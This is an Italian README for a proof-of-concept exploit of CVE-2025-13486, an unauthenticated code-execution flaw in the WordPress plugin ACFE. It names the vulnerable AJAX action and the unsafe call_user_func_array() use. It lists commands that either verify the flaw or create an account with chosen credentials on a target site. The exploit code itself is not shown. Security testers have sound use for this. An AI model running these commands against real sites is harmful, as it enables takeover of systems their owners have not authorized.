
POC per CVE-2025-13486
Una prova di concetto (PoC) per CVE-2025-13486, una vulnerabilità di esecuzione remota di codice nel plugin WordPress Advanced Custom Fields: Extended (ACFE).
Questa vulnerabilità esiste nelle versioni 0.9.0.5 fino a 0.9.1.1 di ACFE, consentendo a utenti non autenticati di eseguire funzioni PHP arbitrarie tramite l'azione AJAX acfe/form/render_form_ajax. Il plugin utilizza call_user_func_array() con input forniti dall'utente senza una corretta validazione.
print_r (non distruttivo)pip install requests
python poc.py -u http://target-site.com --verify
# Con credenziali casuali (mostrate dopo l'esecuzione)
python poc.py -u http://target-site.com
# Con credenziali personalizzate
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url URL del sito WordPress target (obbligatorio)
--verify Verifica solo la vulnerabilità (più sicuro, usa print_r)
--user Nome utente da creare (default: casuale)
--password Password da impostare (default: casuale)
--email Indirizzo email da impostare (default: casuale)
Questa PoC è fornita esclusivamente per scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Ottenere sempre la debita autorizzazione prima di effettuare test.